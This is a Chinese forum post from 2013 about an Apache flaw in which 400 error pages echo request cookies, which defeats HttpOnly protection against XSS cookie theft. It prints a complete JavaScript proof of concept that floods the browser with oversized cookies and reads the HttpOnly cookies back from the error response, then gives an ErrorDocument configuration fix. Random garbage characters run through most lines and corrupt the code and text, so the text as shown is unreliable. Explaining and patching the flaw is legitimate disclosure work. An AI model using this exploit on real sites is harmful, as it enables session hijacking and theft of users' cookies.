很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。. |( t* b3 q1 }1 W1 @' ~
4 {9 C0 z8 E8 {, K
用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:
" ^0 H6 K% R( E. C( r+ j( r 6 z1 }) }9 H' z' X( Q& E
* p) N7 i5 F6 k. [* e3 `// http://www.exploit-db.com/exploits/18442/
+ a, u, A6 x3 G' X! ^/ r8 A& Ffunction setCookies (good) {7 }& z& T2 H4 l+ j( V6 K
// Construct string for cookie value4 K j- l u* V3 Q
var str = "";% Z* E/ [3 Q, l) n7 P
for (var i=0; i< 819; i++) {
0 i4 ~, K4 W9 }4 [9 Bstr += "x";
7 N8 b9 ~4 Z0 q" G- B. i6 F}4 Q8 z- _$ `& V3 @) f( `2 y
// Set cookies
$ l: p' F% ]; r9 P' C! j/ ^* \! ufor (i = 0; i < 10; i++) {* ^9 p+ f- e1 f* [, i
// Expire evil cookie3 j' \/ c5 h% F
if (good) {9 Z4 j5 ~2 r( R) O0 J' i& @
var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
6 v5 M/ K0 n" m" y, c w}' ~" R! X' x7 s6 j8 l2 \
// Set evil cookie' y8 M+ I4 Q/ h2 `
else {
6 h, `% x X7 P& ]. Uvar cookie = "xss"+i+"="+str+";path=/";- h2 `& \& R+ G) B+ C
}
, I1 }5 [7 S* H5 ddocument.cookie = cookie;
E1 d; K9 j# ~0 g8 U W}
! b0 b' m3 t7 P; `" _5 b2 h}
2 k0 S$ i+ k% Z! u- Hfunction makeRequest() {
9 m2 Y3 W) S9 @% I! `setCookies();* w' }$ u& ^" d% K ~3 x
function parseCookies () {* h) _ E, C4 y" F6 \- w% O% T
var cookie_dict = {};
+ J% Q* L+ G! B- T# R// Only react on 400 status2 ^! X1 U1 }5 X( h9 \* W
if (xhr.readyState === 4 && xhr.status === 400) {& h9 h. A0 y/ C
// Replace newlines and match <pre> content
+ S" c( A" J1 }4 {" E) ivar content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);9 a3 R: \6 L) M9 c j- @. Q
if (content.length) {; f) M- e% ?" @ z* c$ }9 D* |
// Remove Cookie: prefix
1 j7 H3 m6 M! [8 Y# K$ Econtent = content[1].replace("Cookie: ", "");
0 b6 |& m& h& o/ }var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
* T& |" z* V- R) I4 Y// Add cookies to object
( I" y! o- i/ |* P) Z+ ^for (var i=0; i<cookies.length; i++) {
: M# ~1 _+ i; f3 s+ Qvar s_c = cookies.split('=',2);
# ?+ I+ O- m6 ~cookie_dict[s_c[0]] = s_c[1];
, }! p% ]" B( q4 n' J9 s; `3 T}. V6 V1 C* M6 h5 t0 {3 A! W
}+ d6 d5 T6 [0 \9 M
// Unset malicious cookies
b g$ b5 D, G' bsetCookies(true);& _. t! f. Z$ V6 T f6 g+ L
alert(JSON.stringify(cookie_dict));) |* z4 }' W' A. q. `( L
}) N) R, ~- S! A5 G2 L7 ?& e
}
$ i, T' B2 n. d2 z" p% F# p// Make XHR request
0 o+ I# |+ k$ Nvar xhr = new XMLHttpRequest();
' B3 n% s' F3 g3 Yxhr.onreadystatechange = parseCookies;
1 x- P/ `, V. [( w' Exhr.open("GET", "/", true);
0 z) s% i# f4 W7 bxhr.send(null);1 [7 y# P. `; n. s: f
}
4 l. ~) ^& k% a1 j2 d$ r5 [makeRequest();
8 G) L N' l' p9 p: B
' @1 @3 P# Q5 Y) K" D你就能看见华丽丽的400错误包含着cookie信息。
; T+ Q( u7 k) Q( w. D5 C8 W4 L( h: I
下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#
$ R2 D6 ~6 U( s0 J1 x1 x. r3 \9 w' x! `. Q* Z3 w, O% E, Y: z
修复方案:
9 a) O" m6 l6 V( Z
1 h2 b2 j+ r! a8 n; [9 h* a" _& d! M- o) wApache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下
# s! Y+ H8 Y" R0 o" @2 Y F4 c1 e1 I! L" }
In the event of a problem or error, Apachecan be configured to do one of four things,# C- `- |8 q0 x# v4 Y, Q0 h
5 b6 [1 B$ R# {7 f
1. output asimple hardcoded error message输出一个简单生硬的错误代码信息
. H- O( f. ]; t' t# l2. output acustomized message输出一段信息
7 C+ L, T. `# e$ g2 h. Q2 k, |3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面
% v% T9 a, p; k% o8 V1 a" K" Q4. redirect to an external URL to handle theproblem/error转向一个外部URL
1 X8 }% b% c& ?6 G$ K
) _1 w7 x9 h1 v+ P5 M! J- G经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容0 {- O( B1 c! d! e2 X" s
" j- b0 Y3 _' d' pApache配置:
|) F8 R; H- Y* ~/ ?8 b4 I) M
8 z- F8 a4 b) {4 MErrorDocument400 " security test"9 w! M( N2 Y( j; W5 h) p; I, Y g+ _: t
1 {1 K9 s N. K! }# p5 l( |当然,升级apache到最新也可:)。
0 B: l# ~$ I4 ]: O2 R9 | a" Y. D1 t' \% _8 T7 ]: s) h! s4 R
参考:http://httpd.apache.org/security/vulnerabilities_22.html* R" i- s2 v+ L; c
, t5 b3 J9 i Q# `# z3 F( w* M( P |
发表于 2013-4-19 19:15:43
收藏
支持
反对